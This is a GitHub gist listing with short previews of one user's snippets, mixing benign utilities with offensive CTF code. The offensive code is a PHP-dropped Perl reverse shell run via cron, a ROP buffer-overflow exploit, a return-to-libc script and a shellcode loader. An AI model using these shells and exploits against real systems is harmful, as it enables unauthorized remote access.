Skip to content

Instantly share code, notes, and snippets.

Avatar

Saf safiire

View GitHub Profile
@safiire
safiire / netstat.rb
Created Feb 25, 2019
Grab Netstat from "hackback" box on HTB
View netstat.rb
#!/usr/bin/env ruby
require 'uri'
require 'net/http'
require 'json'
Url = 'http://hackback:6666/netstat'
puts "Grabbing #{Url}"
uri = URI.parse(Url)
@safiire
safiire / hotp.rb
Last active Apr 1, 2019
A script to calculate an HOTP code
View hotp.rb
#!/usr/bin/env ruby
require 'base32'
require 'openssl'
# Script to calculate HOTP so I don't have to use my phone
class HOTP
def initialize(original_secret, counter = 0)
secret = Base32.decode(original_secret)
@safiire
safiire / cron_executed_reverse_tcp.php
Created Sep 26, 2018
So your shell won't inherit php's file descriptor situation.
View cron_executed_reverse_tcp.php
<?php
$perl = 'use Socket;$i="xx.xx.xx.xx";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
$fp = fopen('/tmp/shell.pl', 'w');
fwrite($fp, "#!/usr/bin/perl\n");
fwrite($fp, $perl);
fclose($fp);
system('chmod 777 /tmp/shell.pl');
$hour = date('H');
$minute = date('i') + 1; // disgusting
$fp = fopen('/tmp/add_cron.sh', 'w');
@safiire
safiire / rc_filter.py
Last active Jan 17, 2019
Rewrote RC filter in Python as a refresher
View rc_filter.py
#/usr/bin/env python
from sys import stdout
from math import pi, log10, pow
Tau = 2 * pi
TableWidth = 20
## Calculate Decibels
def db(ref, val):
@safiire
safiire / exploit.sh
Created Jan 9, 2019
Buffer overflow from a small amount of space, with some ROP and env shellcode
View exploit.sh
#!/bin/bash
# ASLR is on (stack, libs, vdso, etc)
# execstack is on
# .text segment is static, no pie
#
# #include <string.h>
#
# int dobug(char *arg) {
# char buf[8];
# strcpy(buf, arg);
@safiire
safiire / october_aslr_setuid.rb
Last active Nov 8, 2018
Return2LibC for a HTB setuid binary
View october_aslr_setuid.rb
#!/usr/bin/env ruby
# This is what we need to guess from ldd vuln
ldd_load_address = 0xb75ba000
# Next get offset of system() and its address
system_offset = 0x1e310
system_address = ldd_load_address + system_offset
# Next get offset of /bin/sh from strings -d -tx libc.6.so, minus correction
@safiire
safiire / dual.h
Created Oct 11, 2016
My Dual Number implementation
View dual.h
#pragma once
#include <iostream>
#include <cmath>
#include <limits>
#include "saf_math.h"
//// Some more information for adding more functionality here:
//// http://www.euclideanspace.com/maths/algebra/realNormedAlgebra/other/dualNumbers/functions/
@safiire
safiire / mmap.c
Last active Aug 28, 2017
Copy Shellcode into a Write Exec mmap()'d area, and jump to it.
View mmap.c
#include <string.h>
#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
// NOP padded execve("/bin/sh")
char *sc =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
@safiire
safiire / fork_aslr.c
Last active Aug 25, 2017
How many bits are random on Linux ASLR?
View fork_aslr.c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
/*
* A fork() doesn't (and shouldn't) re-randomize the address space
* but that happens properly after the exec()
@safiire
safiire / variadic_print.cpp
Created May 16, 2016
Interesting way of using the new variadic templates to create a variadic print() function.
View variadic_print.cpp
// Compile with: g++ -std=c++11 variadic_print.cpp -o variadic_print
#include <iostream>
// No argument case
void print() {}
// Recursive Variadic Template
template <typename HEAD, typename ... TAIL>
void print(const HEAD& head, const TAIL& ... tail) {